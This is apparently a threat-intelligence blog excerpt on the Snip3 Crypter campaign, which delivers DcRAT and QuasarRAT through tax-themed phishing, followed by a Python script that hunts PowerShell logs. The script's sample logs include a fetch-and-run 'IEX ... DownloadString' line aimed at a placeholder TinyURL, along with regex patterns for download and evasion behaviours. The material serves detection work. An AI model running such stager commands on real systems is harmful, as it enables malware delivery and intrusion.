ThreatLabz has recently identified use of the Snip3 Crypter with new TTPs deploying RAT families including DcRAT and QuasarRAT, targeting victims across multiple industry verticals such as healthcare, energy and utilities, and manufacturing via spear phishing emails with subject lines related to “tax statements” in order to lure victims into execution.

Below are the takeaways from the team’s in-depth analysis of the Snip3 Crypter campaign and the corresponding infection chain, which showcases the observed changes in the TTPs.

- Snip3 Crypter operates with new TTPs to deliver remote access trojans like DcRAT and QuasarRAT to targets.
- Threat actors utilize spear phishing emails with subjects related to “tax statements” as bait to lure victims into executing the multi-staged infection chain.
- The following are the new techniques used in the Snip3 Crypter infection chain:
  - Malicious strings are fetched from database servers via ADODB connections
  - AMSI bypass is performed by forcing an error
  - In-memory stages are decrypted using hardcoded keys with custom decryption routines
  - Commands are received from the download server to decide the flow of execution for delivering the final RAT payload
  - The final Snip3 RAT loader is downloaded from the server along with a corresponding user-agent containing system information
  - Infrastructure is shifted periodically to evade malicious domain-based detections
  - URLs are shortened using TinyURL to download the Stage-2 and Stage-3 PS scripts
  - User-agent changes are used to download the final stage, and a version variable (`$VER = 'v0.2'`) is added in the Stage-3 PS script

ThreatLabz has observed multiple Snip3 campaigns in the Zscaler Cloud targeting a variety of industry verticals. Healthcare emerged as the most targeted sector, as shown in the graph below. Other targeted sectors include energy, manufacturing, materials, finance, retail, and technology.

Fig 1. Industry verticals targeted by the latest Snip3 crypter campaign(s)

Organizations across these sectors should remain vigilant and deploy advanced security measures to protect against Snip3 Crypter and other such threats.

Fig 2. The many observed Snip3 crypter campaigns and their dates

Here, the initial VBS payloads with the filename “Releve Fiscal” (tax relief) were downloaded as an attachment via a phishing email with a subject line related to “tax statements” across 2022.

The ongoing Snip3 campaign constitutes a complex and multifaceted attack, which uses a series of sophisticated evasion techniques and multiple obfuscated scripts.
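Several of the techniques listed above leave recognisable traces in PowerShell script-block logging: a download through a TinyURL-shortened link, the `$VER = 'v0.2'` marker of the Stage-3 script, and the creation of an ADODB connection object used to pull strings from a database server. The following Python is an added hunting example written for this page, not code or detection content from ThreatLabz or Zscaler; the log lines are constructed for the example (the `EXAMPLE-PLACEHOLDER` path is not a real campaign URL), and the rules are heuristics derived only from the behaviours the blog names, so they are a starting point for triage rather than a complete detection.

```python
import re
from typing import Dict, List

# Constructed, simplified PowerShell script-block log lines (Event ID 4104 style).
# They are made up for this example and imitate the behaviours described above:
# a TinyURL-shortened download, the "$VER = 'v0.2'" variable, and an ADODB connection.
SAMPLE_LOGS = [
    "2023-05-02T10:14:03 host=WS-17 ScriptBlock: $VER = 'v0.2'; "
    "$u = 'https://tinyurl.com/EXAMPLE-PLACEHOLDER'; "
    "IEX (New-Object Net.WebClient).DownloadString($u)",
    "2023-05-02T10:14:05 host=WS-17 ScriptBlock: "
    "$cn = New-Object -ComObject ADODB.Connection; $cn.Open($connStr)",
    "2023-05-02T10:20:11 host=WS-17 ScriptBlock: "
    "Get-ChildItem C:\\Users\\Public | Measure-Object",
    "2023-05-02T10:21:00 host=WS-22 ScriptBlock: "
    "Invoke-WebRequest -Uri https://www.example.com/update.ps1 -UseBasicParsing",
]

# Download primitives commonly used by PowerShell stagers.
DOWNLOAD_PRIMITIVE = re.compile(
    r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Invoke-RestMethod|\birm\b",
    re.I,
)
# URL shortener the blog reports for the Stage-2/Stage-3 downloads.
SHORTENER = re.compile(r"\btinyurl\.com\b", re.I)
# Version variable the blog reports in the Stage-3 script.
VERSION_MARKER = re.compile(r"\$VER\s*=\s*['\"]v0\.2['\"]")
# ADODB connection object, used per the blog to fetch malicious strings from a database server.
ADODB = re.compile(r"\bADODB\.Connection\b", re.I)


def scan_line(line: str) -> List[str]:
    """Return the names of the heuristic rules that match one log line."""
    hits: List[str] = []
    # A shortened link on its own is common; only flag it next to a download primitive.
    if DOWNLOAD_PRIMITIVE.search(line) and SHORTENER.search(line):
        hits.append("shortened_url_download")
    if VERSION_MARKER.search(line):
        hits.append("stage3_version_marker")
    if ADODB.search(line):
        hits.append("adodb_connection")
    return hits


def scan_logs(lines: List[str]) -> Dict[int, List[str]]:
    """Map line index -> matched rules, keeping only lines with at least one hit."""
    return {i: hits for i, line in enumerate(lines) if (hits := scan_line(line))}


if __name__ == "__main__":
    for idx, hits in scan_logs(SAMPLE_LOGS).items():
        print(f"line {idx}: {', '.join(hits)}")
```

Lines 0 and 1 of the sample are flagged; the benign directory listing and the plain `Invoke-WebRequest` to a full (non-shortened) URL are not, which is the point of pairing the shortener check with a download primitive rather than alerting on either alone.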